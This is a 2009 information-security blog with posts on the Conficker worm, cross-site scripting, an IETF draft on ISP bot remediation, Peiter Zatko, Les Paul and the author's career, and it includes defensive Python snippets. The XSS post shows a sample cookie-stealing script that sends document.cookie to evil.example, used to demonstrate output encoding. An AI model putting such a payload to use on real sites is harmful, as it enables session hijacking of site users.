Saturday, September 26, 2009

Go Conficker...

A little less than a year ago, Microsoft announced a critical vulnerability in its Server service (MS08-067). The vulnerability involved specially crafted Remote Procedure Call (RPC) requests, which the Server service would mishandle instead of rejecting. The crafter of these requests could use them to execute code of his choice on the server, such as creating or deleting users or changing security policies.

I'd call that a problem. And it wasn't merely a potential problem; the most notorious exploit of this vulnerability is known worldwide as the Conficker worm, first detected not long after Microsoft's initial security bulletin. Since its inception, Conficker has wreaked havoc on government, business, and home computer systems all over the world, and the investigation to discover its perpetrators is still ongoing.

Our best guess is that the perpetrators are based in Ukraine, since Variant E of the worm downloads software from a server hosted there. However, they have not yet been fingered, and in the meantime, they continue to control countless infected computers.

Conficker is easy to miss because nothing splashy happens. The most obvious signs of infection are that user accounts get locked out, security policies change, or automatic updates stop running. In the meantime, Conficker has been active on your network or Internet connection, downloading updates for itself and new malware, modifying your registry, resetting your restore points, and so on.

There's a Microsoft patch that you can install, and all the major AV companies are able to detect and remove the worm. But despite these facts, Conficker continues to propagate, almost a year after its release, and the perpetrators have still not been found. One of the reasons for this is that Conficker is constantly being updated, and can disable some of the AV solutions before they have a chance to detect and remove it.

There is one very easy way to check to see if you are infected with Conficker: go to this page. If you cannot see all six logos, you may very well have been infected.
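Part of why the eye-chart test works is that many Conficker variants block lookups of security vendor domains. You can do a rough version of the same check yourself by trying to resolve a handful of security sites. Here's a minimal Python sketch; the domain list is illustrative (in the spirit of the names Conficker targets), not an authoritative set:

```python
import socket

# Illustrative list of security vendor domains; variants of Conficker
# are known to block lookups for names like these.
SECURITY_DOMAINS = [
    "www.microsoft.com",
    "www.symantec.com",
    "www.mcafee.com",
    "www.f-secure.com",
    "www.kaspersky.com",
    "www.trendmicro.com",
]

def resolves(domain):
    """Return True if the domain resolves to an IP address."""
    try:
        socket.gethostbyname(domain)
        return True
    except socket.gaierror:
        return False

def assess(results):
    """Given a {domain: resolved} map, report whether the pattern
    looks like selective blocking of security sites."""
    blocked = sorted(d for d, ok in results.items() if not ok)
    if not blocked:
        return "no blocking detected"
    return "possible infection: cannot reach " + ", ".join(blocked)

# Usage: assess({d: resolves(d) for d in SECURITY_DOMAINS})
```

A failed lookup can have plenty of innocent causes, so treat a "possible infection" result as a prompt to run a real scanner, not as a diagnosis.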

Wednesday, September 23, 2009

XSS Is Alive and Well

Not all that long ago, I had an interview where I was asked what cross site scripting was. Now, the thing is, I know very well what it is, and in fact, while I was working for my former employer, I wrote a white paper on the subject that was very widely used by their support and systems engineering personnel.

But have you ever been in the position of knowing something, yet when someone asks you about it, you just go cold? That's what happened to me in the interview. I stammered out a reply that was utterly wrong, and I knew it was utterly wrong, and I've been kicking myself ever since.

In the meantime, on a technical email list, one of my colleagues suggested that cross site scripting -- or XSS -- is no longer much of an issue, because everyone knows about it and has taken precautions. That position is naive at best. It's true that XSS isn't the hot topic it was a couple of years ago, but it's still very much alive and well as a security vulnerability.

One of the problems in understanding XSS, or cross site scripting, is that the term itself is confusing. Originally it meant that a malicious web site could load another web site into a frame or a window, and then use scripting -- usually JavaScript -- to read and/or write data on that site (which is actually close to what I told my interviewer). However, later on, the term changed to mean "code injection" of scripting into a web page.

There are different kinds of XSS vulnerabilities, but the most typical type is where a user is enticed to click on or otherwise activate a URL that includes scripting. This isn't that hard to do, because users, especially less technically sophisticated ones, often don't look at where a URL is actually directing them before they click on it.

Further, and unbeknownst to many users, it's possible to encode an object on a web page with a malicious URL such that just by viewing the page, the user is activating that URL. There's no way for the user to tell what's happened, and the only way to prevent it is to lock down the user's web browser such that it will not execute any scripts it finds on a web page. The problem with this is that locking down the browser to this degree will cause media-rich web sites to malfunction (from the user's point of view). In other words, as has always been the case, security is often sacrificed for ease of use.
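To make the injection mechanics concrete, here is a minimal Python sketch of the server side of a reflected XSS hole and its standard fix. The `render_greeting_*` functions are hypothetical stand-ins for whatever code echoes a query parameter back into a page; the defense is output encoding, shown here with the standard library's `html.escape`:

```python
import html

def render_greeting_unsafe(name):
    # Vulnerable: the parameter is interpolated verbatim, so any
    # markup in `name` becomes live markup in the delivered page.
    return "<p>Hello, %s!</p>" % name

def render_greeting_safe(name):
    # Defense: encode HTML metacharacters on output, so injected
    # tags arrive as inert text rather than executable script.
    return "<p>Hello, %s!</p>" % html.escape(name)

# A classic cookie-stealing payload smuggled in via a query string:
payload = '<script>document.location="http://evil.example/?c=" + document.cookie</script>'
```

Feed that payload to the unsafe function and the victim's browser gets a live script element; feed it to the safe one and it renders as harmless text.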

XSS vulnerabilities have been exploited since the advent of the World Wide Web, but XSS became a really hot topic in 2005, which is when my former employer asked me to write the white paper about how one of their products addressed the issue. Vulnerability scanning for XSS was all the rage, and web site developers were scrambling to fix their HTML and scripting so that code injection could no longer work. Gradually, things calmed down to the point where my colleague could declare on a mailing list full of security geeks that it was no longer an issue. Too bad he was wrong.

The other day, one of my friends commented on a LiveJournal™ post I'd made, to the effect that it appeared my post had been hacked. He directed me to a news article on LJ that I'd missed: http://news.livejournal.com/117957.html. You can read the article for yourself, but basically what happened is that someone had managed to infect a Flash™ file with a malicious URL. Anybody who viewed the file would have their latest (at the time) LJ post altered: the infected file would be inserted, any tags or other extra info would be deleted, and (usually) the post's security level (i.e., public/friends only/private) would be altered.

Sure enough, my post was "infected". My tags and location were removed, a formerly "friends only" post (the default for my journal) was now public, and the infected media had been inserted. However, the site already knew about the problem: it had turned off media embedding so that no further users would be affected, and it had issued a bulletin explaining what had happened. As a result, all I saw were the "boxes" mentioned in the news article, not the infected media. At this point, I have no idea what the media looked like or who I "caught" the infection from, but as it's been contained and fixed (and my post is now "friends only" again), I'm only mildly curious.

The LiveJournal™ problem was caught and mitigated quickly, and while certainly there was a breach of privacy (secure entries becoming public, email addresses being mined), the effects were relatively minor. But it should be pretty obvious that XSS is far from "no longer an issue", given what happened.

Thursday, September 17, 2009

this just in

So, in case you're not aware of it, there's an online petition to have Peiter Zatko appointed to the post of Cybersecurity Chief (also known as the Cybersecurity Czar). As soon as I heard of the petition, I clicked through to sign it, even though I'm not sure what, if any, effect the petition will have on Mr. Obama's decision. The fact of the matter is that I admire Mr. Zatko so much that I couldn't fail to sign it.

Mr. Zatko, who is currently 38 years old, has been a researcher in the field of network security for as long as the field has been extant. In 1995, he published the seminal white paper on the buffer overflow attack, "How to Write Buffer Overflows", which remains an important tutorial on the topic today for hackers of all varieties. Choosing to use his abilities to help rather than harm the government, he was one of several hackers to testify on security weaknesses before a Senate committee in 1998. Two years later, he met with then-President Clinton at a summit on network security. Currently, he is a division scientist at BBN, who knows a good thing when they see it (they wooed him back again after losing him in the '90s to @stake, which was essentially the L0pht gone corporate).

I believe that Mr. Zatko could ably fill the position of Cybersecurity Czar; in fact, he is uniquely suited to it because of his background in grey hat hacking. My feeling is that if Mr. Obama is serious about network security, he will appoint Mr. Zatko or someone very much like him to this very important post.

Go for it, Mudge!

Wednesday, September 16, 2009

IETF Publishes a Draft on Remediating Bots in ISP Networks

The Internet Engineering Task Force just published a draft on how ISPs can help to remediate bots on users' systems or home networks. Having read the draft, I do have a couple of thoughts on it, which I will present after a quick synopsis of the draft.

Synopsis of Draft


In short, the draft covers the following subjects:
  • Maintaining privacy of the user

  • Non-interference with legitimate traffic

  • Recommendation for types of tools

  • Challenge of "definitive vs. likely" in informing user

  • Dealing with user complaints

  • Sharing of bot information with other ISPs

  • Use of Honeynets

  • Informing users:

    • Email

    • Telephone

    • Postal Mail

    • "Walled Garden"

    • IM

    • SMS

    • Web browser message

  • Remediation

  • Guided Remediation


So for me this actually brings up a couple of questions. First of all, who's responsible for a bot on the network? And second, what is actually going to work in a situation like this?

Responsibility


If there is a bot -- or really, any malicious piece of code -- on a user's personal system, who is responsible for discovering and/or remediating it? Unfortunately, the answer isn't obvious. The user owns all of his computers and networking equipment, up to and in some cases including the DSL or cable modem. That said, the ISP owns the actual connectivity. The ISP will also get the black eye if malicious packets come through its networks, for example, if computers on the ISP's networks are used in DDoS attacks. The hope is that the ISP would find and remediate the malicious code before that happens, but how far can (and should) the ISP go in the attempt to do so?

What Actually Works


The draft, in discussing options for informing users, talks about a "walled garden". What a "walled garden" does is place the user's account in some degree of isolation from the rest of the network, cutting off access to some or all services. The presumption is that the user will notice that his access is cut off and will contact the ISP, initiating a dialog that can lead to remediation. The draft mentions that the walled garden can persist until the problem is remediated, or it can be lifted as soon as the user has been informed of the malicious code.

In my opinion, the walled garden should serve several purposes:

  • Inform the user of a potential bot or malware based on the ISP's scanning (etc.) activity;

  • Remain as a safety net while the ISP and the user dialog about further malware scanning and remediation, and begin that process;

  • If the malware is found to actually exist, remain as a continued safety net until everything has been done, by both the ISP and the user, to remediate the situation.
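As a sketch of how that extended policy could behave, here is a small Python state machine. The state names and confirmation steps are my own invention, not the draft's; the key property is that isolation persists until both the ISP and the user confirm remediation is complete, rather than lifting as soon as the user is informed:

```python
# State names are my own, not the draft's.
DETECTED, NOTIFIED, REMEDIATING, CLEARED = "detected", "notified", "remediating", "cleared"

class WalledGarden:
    """Tracks one subscriber account under the extended walled-garden
    policy: isolation lifts only when remediation is confirmed."""

    def __init__(self):
        self.state = DETECTED

    @property
    def isolated(self):
        # Isolation ends only at CLEARED, not at mere notification.
        return self.state != CLEARED

    def notify_user(self):
        # Informing the user does NOT lift the garden.
        if self.state == DETECTED:
            self.state = NOTIFIED

    def begin_remediation(self):
        if self.state == NOTIFIED:
            self.state = REMEDIATING

    def confirm_clean(self, isp_ok, user_ok):
        # Both parties must agree the machine is clean.
        if self.state == REMEDIATING and isp_ok and user_ok:
            self.state = CLEARED
```

Under the "lift on notification" alternative the draft also allows, `notify_user` would clear the isolation immediately; the difference between the two policies is exactly that one transition.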

In other words, keep the user's account isolated to at least some degree until the problem is fixed. Obviously, this is not going to be something that users will necessarily like, especially if they don't understand what's going on. And here is where I think ISPs need to take more responsibility, from the start, when users first sign up for Internet service.

In general, ISPs sign users up for Internet service, and then they just let them go. For users like myself, who know what they're doing on a network, and just want to be left alone, this is a pretty good option. But any user can become the victim of malicious code, no matter how sophisticated they are, and I think that ISPs are letting users down when they don't try to educate them about malware and what it can do. Just providing users with a CD of "connection" software, which may or may not contain AV and antispyware tools at a minimum, is not enough to fulfill an ISP's responsibility to keep bots and malware from reinfecting the Internet from its users' machines.

That's why I think the extended walled garden approach is necessary, combined with the ISP stepping in to help the user confirm the presence of the malware and then remove it. But I also think that the ISP has to take more responsibility up front, to help the user understand what malware is, what it can do, and what to do to mitigate possible threats. In other words, I like the draft as far as it goes, but I don't think it goes far enough.

Friday, August 14, 2009

how high the moon

This isn't really about security, but it is about technology.

As we all know, Les Paul died yesterday. When I heard the news, I wasn't surprised -- he was pretty old -- but I was definitely sad. Les Paul's guitars and his wife Mary Ford's voice were a huge part of my early childhood. As a child who loved to sing, I was very interested in the multiple vocal tracks; naturally I thought it was several women singing. My parents explained the concept of multi-tracking and I became quite fascinated. It wasn't until recently that I had the ability to do more than double-tracking, but I still experiment with vocalizing and multitracking now and then. Later on, I learned a lot more about Les Paul's work with Gibson and came to worship the Les Paul style of guitar for the incredible instrument it is. I no longer own a Les Paul guitar myself, but at some point I may invest in one again (the one I had was the less expensive Epiphone™ model).

I could go on in depth about how multitracking works, but I wouldn't be able to describe it as well as Les and Mary themselves, as they joked with Alistair Cooke on Omnibus, shown in this clip:



RIP, Les. You're missed.

Thursday, August 13, 2009

what's the point?

I was asked some philosophical questions today in an interview, about what the point is of Information Security, and why I do that instead of something else. The questions were general enough that I don't feel it's unethical to talk about them here, so I'm going to expound on them a bit.

First of all, why am I in Infosec? I sort of "fell into" the profession, unlike a lot of people who have perhaps more technical backgrounds. It's not that I don't have a technical background at all -- I knew how to spell TCP/IP before I got into Infosec -- but most of what I know about networking and systems was learned on the job, not something I knew before I started. There will probably always be gaps in my knowledge because of this, and it can be pretty frustrating to be confronted with those gaps.

But on the other hand, one of the things I love about Infosec is that NOBODY knows everything. There is always more to know. There are people who are looked up to, but the true Information Security professional never feels that it's possible to be an expert. There is no one tried and true way to effect security; there is theory and there is practice and there is hard work. There is guessing, and hunches, and aha! moments. There is the triumph when you have defeated a problem, and there is the sick, sweaty panicky feeling when you know that there is a problem but not exactly what it is or how to fix it.

And that is what I love about Infosec, and why I do it. It's a sea of chaos out of which I can do my best to make some order. It is a never-ending source from which I can drink knowledge. It's the frontier, and I love to explore it, even if I occasionally get eaten by a tiger.

And that's the thing; we are in fact going to be eaten by tigers. Because the only truly effective way to secure a system is to disallow it from BEING a system -- to cut off all access to it -- there can never be any assumption of security. There will be breaches and leaks. However, that knowledge is no reason to stop trying to secure systems and networks. I lock my car doors when I walk away, even though I know that a determined thief can break in. I want to make it hard for him to break in, and once he does, I want to make it very difficult for him to get away with my goods. It's a battle that I may not always win, but if there is a point to doing business at all, there is a reason to try to secure the means of doing that business. And after you have done everything you can think of to secure the systems and network, you never assume you have succeeded; you continue to check, you monitor, you look for the little things, you keep on pushing, because the tigers are hungry.

There are other things I like to do. In fact, I probably spend too much time doing some of them. But over and over, Information Security engages my passion, and seems to me to be something worth doing. And that is why I do it.

Wednesday, August 12, 2009

black what now?

Not all that long ago, I joined a mailing list called WISE, which stands for Women In Science and Engineering. Once I'd joined it, I wondered what had taken me so long. Subsequently, one of the other members -- the same one who had invited me to the list -- talked about her professional blog, and I began wondering again. This time I wondered why I, an Infosec professional for over a decade and a prolific writer, didn't have a professional blog.

The answer to that question is simple but sad: I didn't realize, until fairly recently, that I had something to say. As a woman in Infosec -- there are still so very few of us -- I am something of a dancing bear, and I have been admonished to "shut up" by my male colleagues fairly often. Looking around, I am not seeing other female Infosec professionals with blogs or who contribute to the "official" blogs in the industry.

I'm not interested in bringing feminism to Information Security. Rather, knowing that I am good at what I do, I am interested merely in being heard. I am not so different from my male colleagues. I think that I do, in fact, have something to say.

So why Black Cats and Smoke and Mirrors? Well, first of all, I'm a nerd, and nerds love puns. Many IT professionals don't really understand Infosec, so I'm making fun of that. In addition, though most of us don't exactly brag about it, there's a little "black cat" in every white hat; in order to figure out how to protect systems, we have to know how to break or break into them. While obfuscation isn't the best or only way to protect, smoke and mirrors does play a part in securing systems and assets.

Although currently I'm between positions (and doing research in forensics on my downtime), I'm constantly thinking about and reading about Infosec. I think it's time I took all that thinking and reading and wrote about it, too. I hope that you'll agree that I have something to say.